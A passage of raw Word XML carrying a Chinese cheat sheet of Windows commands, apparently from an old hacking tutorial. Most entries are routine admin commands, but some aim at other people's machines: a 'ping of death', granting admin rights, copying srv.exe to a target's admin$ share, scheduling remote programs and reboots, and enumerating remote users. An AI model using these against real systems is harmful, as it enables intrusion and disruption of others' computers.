        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>添加到管理员中使其具有管理员权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用复数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net start  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看开启了哪些服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net start </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">服务名　</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开启服务；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:net start telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> net start schedule)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net stop </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止某服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>net time \\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">ip  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看对方时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>net time \\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">ip /set  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置本地计算机时间与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>主机的时间同步</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>加上参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可取消确认信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net view  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看本地局域网内开启了哪些共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net view \\ip  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看对方局域网内开启了哪些共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net config  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示系统网络设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net logoff  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>断开连接的共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net pause </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>暂停某服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>net send ip "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文本信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">"  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>向对方发信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net ver  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>局域网内正在使用的网络连接类型和信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net share  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看本地开启的共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net share ipc$  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ipc$</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net share ipc$ /del  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ipc$</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net share c$ /del  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net user guest 12345  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>guest</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户登陆后用将密码改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>12345</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net password </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>更改系统登陆密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">netstat -a  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看开启了哪些端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>常用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>netstat -an</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">netstat -n  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看端口的网络连接情况，常用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>netstat -an</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">netstat -v  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看正在进行的工作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">netstat -p </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>协议名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">netstat -p tcq/ip  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看某协议使用情况（查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>tcp/ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>协议使用情况）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">netstat -s  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看正在使用的所有协议使用情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">nbtstat -A ip  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>对方</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>136</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>139</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>其中一个端口开了的话，就可查看对方最近登陆的用户名（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>前的为用户名）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注意：参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>-A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要大写</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>tracert -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> ip(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或计算机名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>跟踪路由（数据包），参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“-w</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>数字</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用于设置超时间隔。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>ping ip(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或域名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>向对方主机发送默认大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>字节的数据，参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“-l[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>空格</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>数据包大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“-n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>发送数据次数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“-t”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指一直</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ping -t -l 65550 ip  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>死亡之</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ping(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>发送大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的文件并一直</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就成了死亡之</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ping)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">ipconfig (winipcfg)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>windows NT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>XP(windows 95 98)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>地址，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“/all”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示全部配置信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">tlist -t  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以树行列表显示进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为系统的附加工具，默认是没有安装的，在安装目录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Support/tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件夹内</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">kill -F </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进程名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>-F</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数后强制结束某进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为系统的附加工具，默认是没有安装的，在安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t>目录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Support/tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件夹内</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">del -F </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>加</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>-F</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数后就可删除只读文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,/AR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/AH</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/AA</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>分别表示删除只读、隐藏、系统、存档文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/A-R</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/A-H</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/A-S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/A-A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示删除除只读、隐藏、系统、存档以外的文件。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“DEL/AR *.*”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示删除当前目录下所有只读文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“DEL/A-S *.*”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示删除当前目录下除系统文件以外的所有文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">del /S /Q </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或用：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">rmdir /s /Q </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  /S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除目录及目录下的所有子目录和文件。同时使用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/Q </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可取消删除操作时的系统确认就直接删除。（二个命令作用相同）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">move </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要移动的文件名　存放移动文件的路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>移动后文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>移动文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/y</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将取消确认移动目录存在相同文件的提示就直接覆盖</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">fc one.txt two.txt &gt; 3st.txt  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>对比二个文件并把不同之处输出到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3st.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"&gt; "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">"&gt; &gt;" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是重定向命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>at id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开启已注册的某个计划任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">at /delete  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止所有计划任务，用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>则不需要确认就直接停止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>at id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /delete  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止某个已注册的计划任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">at  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看所有的计划任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">at \\ip time </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或一个命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">) /r  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在某时间运行对方某程序并重新启动计算机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">finger username @host  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看最近有哪些用户登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">telnet ip </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>远和登陆服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>默认端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">open ip  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>连接到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>（属</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>登陆后的命令）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">telnet  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在本机上直接键入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将进入本机的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">copy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">　路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">2 /y  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到指定的目录为文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/y</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就同时取消确认你要改写一份现存目录文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">copy c:\srv.exe \\ip\admin$  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>c:\srv.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>到对方的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>下</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cppy 1st.jpg/b+2st.txt/a 3st.jpg  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
